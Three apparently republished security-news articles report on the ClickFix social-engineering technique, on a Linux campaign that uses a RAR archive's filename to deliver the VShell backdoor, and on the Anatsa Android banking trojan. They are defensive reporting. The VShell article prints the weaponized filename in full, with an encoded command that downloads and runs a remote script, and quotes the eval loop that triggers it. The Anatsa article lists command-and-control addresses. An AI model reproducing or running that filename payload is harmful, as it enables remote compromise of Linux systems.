Cybersecurity researchers have identified a sophisticated social engineering technique called ClickFix that has been rapidly gaining traction among threat actors since early 2024.

This deceptive attack method targets both Windows and macOS devices, tricking users into executing malicious commands through seemingly legitimate technical troubleshooting procedures.

The technique has been observed in campaigns affecting thousands of enterprise and consumer devices globally on a daily basis, representing a significant evolution in social engineering tactics.

The ClickFix technique operates by presenting users with fake error messages, CAPTCHA verifications, or human verification prompts that appear to require immediate action to resolve minor technical issues.

These lures are typically delivered through phishing emails, malicious advertisements, or compromised websites that redirect victims to specially crafted landing pages.

The attack’s effectiveness lies in its exploitation of users’ natural tendency to solve apparent technical problems, making it particularly dangerous as it bypasses traditional automated security solutions through human interaction.

Microsoft analysts identified multiple threat actors leveraging ClickFix attacks to deliver a diverse array of malicious payloads, including the prolific Lumma Stealer infostealer, remote access tools such as Xworm and AsyncRAT, loaders like Latrodectus and MintsLoader, and sophisticated rootkits including a modified version of the open-source r77.

These payloads typically operate as “fileless” malware, loaded directly into memory by living-off-the-land binaries rather than being written to disk as traditional executable files.

The attack chain begins when victims encounter visual lures that mimic legitimate services such as Cloudflare Turnstile verification, Google reCAPTCHA, or even social media platforms like Discord.

When users interact with these fake verification systems, malicious JavaScript code executes in the background, copying obfuscated commands to the user’s clipboard using the navigator.clipboard.writeText() function.

Technical Implementation and Command Execution

The core of the ClickFix technique revolves around manipulating the Windows Run dialog box, accessed through the Windows key + R shortcut.

Threat actors have strategically chosen this approach because most users are unfamiliar with this Windows component and its potential security implications.

The malicious commands typically involve PowerShell cmdlets such as iwr (Invoke-WebRequest), irm (Invoke-RestMethod), and iex (Invoke-Expression) to download and execute payloads from remote servers.

A notable case study involves the Lampion malware campaign first identified in May 2025, which targeted Portuguese organizations across government, finance, and transportation sectors.

The campaign utilized a sophisticated multi-stage infection process beginning with phishing emails containing ZIP files. Upon opening, these archives contained HTML files that redirected users to a fake Portuguese tax authority website hosting the ClickFix lure.

The subsequent PowerShell command downloaded an obfuscated VBScript that created additional scripts in the Windows %TEMP% directory and established persistence through scheduled tasks.

The technique’s adaptability extends beyond Windows environments, with recent campaigns observed targeting macOS users to deliver Atomic macOS Stealer (AMOS).

These attacks demonstrate the technique’s cross-platform capabilities, utilizing similar social engineering tactics while adapting the underlying commands for macOS terminal execution.

The macOS variant employed sophisticated password theft mechanisms, continuously prompting users for system passwords and utilizing the stolen credentials to bypass macOS security features through xattr -c commands.

Detection of ClickFix attacks relies on monitoring the RunMRU registry key, which maintains a history of Run dialog executions.

Security teams can identify suspicious activity by examining entries containing living-off-the-land binaries, direct IP addresses, content delivery network domains, or files with suspicious extensions.

Microsoft’s research reveals that threat actors frequently employ obfuscation techniques including Base64 encoding, string concatenation, and escaped characters to evade detection systems.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Microsoft Warns of Hackers Using ClickFix Technique to Attack Windows and macOS Devices appeared first on Cyber Security News.

Linux environments, long considered bastions of security, are facing a sophisticated new threat that challenges traditional assumptions about operating system safety.

A recently discovered malware campaign exploits an ingenious attack vector that weaponizes RAR archive filenames to deliver the VShell backdoor, demonstrating how attackers are evolving beyond conventional exploitation techniques to target scripting patterns and file metadata.

The attack begins with a seemingly innocuous spam email disguised as a beauty product survey invitation, offering a small monetary reward to entice victims.

Unlike traditional phishing campaigns that focus on credential theft or brand impersonation, this social engineering approach exploits user curiosity while delivering a malicious RAR archive attachment.

The archive contains a file with a specially crafted filename that serves as a dormant payload, waiting to execute when processed by common shell operations.

What makes this attack particularly insidious is its exploitation of dangerous patterns prevalent in Linux shell scripts.

Trellix researchers identified that the malicious filename contains embedded Bash-compatible code designed to execute commands when interpreted by the shell during routine operations such as directory enumeration or file listing.

The filename itself acts as a payload trigger, bypassing traditional security defenses that typically focus on file content rather than metadata.

The weaponized filename follows a complex structure that leverages shell command injection principles.

When extracted, the archive reveals a file named ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash, which cannot be manually created through normal shell input due to its special characters being interpreted as command syntax.

This filename was likely crafted using external tools or programming languages to bypass shell input validation.

Infection Mechanism and Execution Chain

The infection triggers when shell scripts process the malicious filename through common operations like for f in *; do eval "echo $f"; done.

Multiple trigger vectors exist, including file listing operations with eval functions, find commands with eval parameters, and xargs processing with shell expansion.

The embedded payload utilizes a multi-stage approach where the filename evaluates to a Base64-decoded command piped directly to bash.

Once triggered, the initial stage downloads a second-stage script that detects system architecture and fetches the appropriate ELF binary for x86, x64, ARM, or ARM64 systems.

The final payload, VShell, operates entirely in memory using fexecve() to avoid disk-based detection while masquerading as legitimate kernel threads like [kworker/0:2].

This sophisticated evasion technique demonstrates the evolution of Linux-targeted malware toward more stealthy, memory-resident operations that challenge traditional security paradigms.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post New Linux Malware With Weaponized RAR Archive Deploys VShell Backdoor appeared first on Cyber Security News.

The Anatsa banking trojan, also known as TeaBot, continues to evolve as one of the most sophisticated Android malware threats targeting financial institutions worldwide.

First discovered in 2020, this malicious software has demonstrated remarkable persistence in infiltrating Android devices through the official Google Play Store, where it masquerades as legitimate document reading applications to steal user credentials and monitor keystrokes.

The malware employs a sophisticated dropper technique, distributing seemingly benign applications through Google’s official marketplace that appear as standard file managers or document readers.

Once installed, these decoy applications silently download malicious payloads disguised as routine software updates from command-and-control servers, effectively bypassing Google Play Store security mechanisms.

The latest campaigns have significantly expanded Anatsa’s reach to target over 831 financial institutions across multiple continents, including newly added regions such as Germany and South Korea, alongside numerous cryptocurrency platforms.

Zscaler analysts identified that many of these malicious decoy applications have individually exceeded 50,000 downloads, contributing to a broader ecosystem where 77 malicious applications from various malware families have collectively achieved over 19 million installations.

The researchers noted that Anatsa has streamlined its payload delivery mechanism by replacing dynamic code loading of remote Dalvik Executable files with direct installation of the core malicious payload.

Advanced Evasion and Persistence Mechanisms

The current Anatsa variant implements sophisticated anti-analysis techniques that significantly enhance its detection evasion capabilities.

The malware now employs Data Encryption Standard runtime decryption, dynamically generating DES keys to decrypt each string during execution, making static analysis considerably more challenging for security researchers.

The malware utilizes corrupted ZIP archives with invalid compression and encryption flags to conceal DEX files, which are deployed during runtime. This technique exploits weaknesses in standard ZIP header validation used by analysis tools while maintaining compatibility with Android devices.

Once successfully installed, Anatsa requests accessibility permissions and automatically enables critical system privileges including SYSTEM_ALERT_WINDOW, READ_SMS, and USE_FULL_SCREEN_INTENT.

Communication with command-and-control servers occurs through encrypted channels using a single-byte XOR encryption key (decimal value 66), with the malware maintaining connections to multiple C2 domains including 185.215.113.108:85 and 193.24.123.18:85 for redundancy and persistence.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Anatsa Malware Attacking Android Devices to Steal Login Credentials and Monitor Keystrokes appeared first on Cyber Security News.